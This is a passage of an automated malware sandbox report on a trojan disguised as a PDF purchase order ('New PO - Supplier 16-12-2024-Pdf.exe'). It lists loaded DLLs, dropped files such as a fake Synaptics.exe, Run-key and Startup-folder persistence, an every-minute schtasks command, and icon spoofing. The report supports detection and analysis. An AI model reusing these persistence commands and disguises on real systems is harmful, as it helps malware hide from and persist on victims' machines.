                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: BBLXFG.lnk.2.drLNK file: ..\..\..\..\..\Windata\TXAASJ.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\iY4U6FM.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic file information: File size 2203648 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: New PO - Supplier 16-12-2024-Pdf.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16f800
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB20F6 LoadLibraryA,GetProcAddress,9_2_00EB20F6
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E77795 push ecx; ret 9_2_00E777A8

                              Persistence and Installation Behavior

                              barindex
                              Drops PE files to the document folder of the user
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\RCX6FCE.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\RCX6FCE.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\IPKGELNTQY\~$cache1Jump to dropped file

                              Boot Survival

                              barindex
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BBLXFG.exe /tr C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnkJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnkJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BBLXFGJump to behavior

                              Hooking and other Techniques for Hiding and Protection

                              barindex
                              Icon mismatch, binary includes an icon from a different legit application in order to fool users
                              Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E6F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_00E6F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EB7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_00EB7F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00E71E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_00E71E5A
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                              Source: C:\Users\user\Desktop\New PO - Supplier 16-12-2024-Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_New PO - Supplier 16-12-2024-Pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
